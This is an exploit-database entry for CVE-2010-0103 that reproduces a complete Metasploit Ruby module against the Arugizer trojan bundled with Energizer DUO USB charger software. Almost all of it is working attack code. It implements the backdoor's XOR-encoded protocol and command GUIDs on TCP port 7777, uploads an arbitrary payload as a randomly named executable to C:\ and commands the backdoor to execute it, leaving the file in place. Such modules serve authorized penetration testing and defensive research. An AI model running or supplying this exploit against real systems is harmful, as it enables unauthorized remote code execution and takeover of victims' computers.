Energizer DUO USB Battery Charger Unauthorized Access Vulnerability

2010-03-18
ID: 9702
CVE: CVE-2010-0103 (as referenced by the module below; the listing header originally said "None")
Download vulnerable application: None
Credit:          Ed Schaller
Vulnerable:     Energizer DUO 0
  ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
  require 'msf/core'
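  class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::Tcp

    # Single-byte XOR key the Arugizer backdoor applies to every byte it sends or
    # receives. The encoding is symmetric, so one helper serves both directions.
    XOR_KEY = 0xE5

    # Command identifiers understood by the backdoor, keyed by the symbol this
    # module uses for them. Each request starts with one of these GUID strings.
    # Only :write, :exec and :nop are used by #exploit; the rest are listed so the
    # protocol surface is visible (this module never issues :delete, so the
    # uploaded file is left on disk).
    COMMAND_IDS = {
      :exec    => "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}",
      :dir     => "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}",
      :write   => "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}",
      :read    => "{F6C43E1A-1551-4000-A483-C361969AEC41}",
      :nop     => "{783EACBF-EF8B-498e-A059-F0B5BD12641E}",
      :find    => "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}",
      :yes     => "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}",
      :runonce => "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}",
      :delete  => "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}",
    }.freeze

    # Module metadata and options. The only option registered here is RPORT,
    # defaulting to 7777, the TCP port the backdoor listens on.
    def initialize(info = {})
      super(update_info(info,
        'Name'           => 'Energizer DUO Trojan Code Execution',
        'Description'    => %q{
          This module will execute an arbitrary payload against
          any system infected with the Arugizer trojan horse. This
          backdoor was shipped with the software package accompanying
          the Energizer Duo USB battery charger.
        },
        'Author'         => [ 'hdm' ],
        'License'        => MSF_LICENSE,
        'Version'        => '$Revision: 8749 $',
        'References'     =>
          [
            ['CVE', '2010-0103'],
            ['URL', 'http://www.kb.cert.org/vuls/id/154421']
          ],
        'Platform'       => 'win',
        'Targets'        =>
          [
            [ 'Automatic', { } ],
          ],
        'DefaultTarget'  => 0
      ))

      register_options(
        [
          Opt::RPORT(7777),
        ], self.class)
    end

    # XOR every byte of +str+ with XOR_KEY and return the result as a new
    # binary string. Applying it twice yields the original input.
    #
    # @param str [String] raw bytes to encode (or decode)
    # @return [String] the XOR-transformed bytes
    def trojan_encode(str)
      str.unpack("C*").map { |c| c ^ XOR_KEY }.pack("C*")
    end

    # Build the encoded request header for a backdoor command: a 32-bit
    # little-endian length covering the GUID plus its NUL terminator, followed
    # by the NUL-terminated GUID, all XOR-encoded.
    #
    # @param cmd [Symbol] one of the keys of COMMAND_IDS
    # @return [String] the encoded header bytes
    # @raise [ArgumentError] when +cmd+ is not a known backdoor command. The
    #   original fell through with an empty identifier and would have sent a
    #   malformed (length 1, NUL-only) header to the target instead of failing.
    def trojan_command(cmd)
      cid = COMMAND_IDS[cmd]
      raise ArgumentError, "unknown Arugizer command: #{cmd.inspect}" unless cid

      trojan_encode([cid.length + 1].pack("V") + cid + "\x00")
    end

    # Upload the payload as a randomly named EXE in the root of C:\ and ask the
    # backdoor to execute it. Both string fields (file name, file body) are sent
    # as a 32-bit little-endian length followed by the bytes; the length counts
    # the trailing NUL that is appended to each field. Every value on the wire
    # goes through trojan_encode.
    #
    # NOTE(review): no response is read from the backdoor, so a failed write
    # (e.g. the backdoor process lacking rights to the drive root) is not
    # detected here; presumably the payload handler reports failure by never
    # receiving a session. The file is not removed afterwards.
    def exploit
      nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
      exe = Msf::Util::EXE.to_win32pe(framework, payload.encoded) + "\x00"

      print_status("Trying to upload #{nam}...")
      connect

      # Write file request: command, then length-prefixed name and body.
      sock.put(trojan_command(:write))
      sock.put(trojan_encode([nam.length].pack("V")))
      sock.put(trojan_encode(nam))
      sock.put(trojan_encode([exe.length].pack("V")))
      sock.put(trojan_encode(exe))

      # Required to prevent the server from spinning a loop
      sock.put(trojan_command(:nop))

      disconnect

      #
      # Execute the payload
      #
      print_status("Trying to execute #{nam}...")
      connect

      # Execute file request: command, then the length-prefixed name.
      sock.put(trojan_command(:exec))
      sock.put(trojan_encode([nam.length].pack("V")))
      sock.put(trojan_encode(nam))

      # Required to prevent the server from spinning a loop
      sock.put(trojan_command(:nop))

      disconnect
    end
  end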